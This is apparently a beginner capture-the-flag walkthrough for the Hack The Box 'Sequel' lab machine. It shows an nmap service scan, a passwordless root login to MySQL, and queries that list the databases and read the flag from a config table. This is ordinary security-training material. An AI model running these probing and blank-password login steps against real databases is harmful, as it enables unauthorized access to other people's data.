top of page

Sequel


Enumeration


As usual, let's start with our nmap

nmap -sV -sC IP

-sV : service detection

-sC : performs a script scan


Replace IP by the IP of the target machine (Sequel)

Note: The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

Port 3306 is usually associated with MySQL protocol. MySQL is a service used for database management such as creating, modifying or deleting databases.



Foothold


Type this command to get more info on how to use the command sql

mysql --help

We find that we need to add -u followed by the username:

We find that we need to add -h followed my the hostname or IP:

We don't know any username but we can try our luck with the user root.

mysql -u root -h 10.129.231.168

Notice that we were not even asked for a password, meaning that the administrator forgot to set up a password. We are in luck!


Now that we are in the database, let's type:

show databases;

This command lists all the databases available.


use htb;

This command advises that we want to use the database called htb


show tables;

This command is used to show us all the tables available in the database htb


SELECT * from config;

This means we want to select and show everything (rows and columns) that is in the table config

Congratulations! You got the flag!

10,005 views0 comments

Recent Posts

See All

Crocodile

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page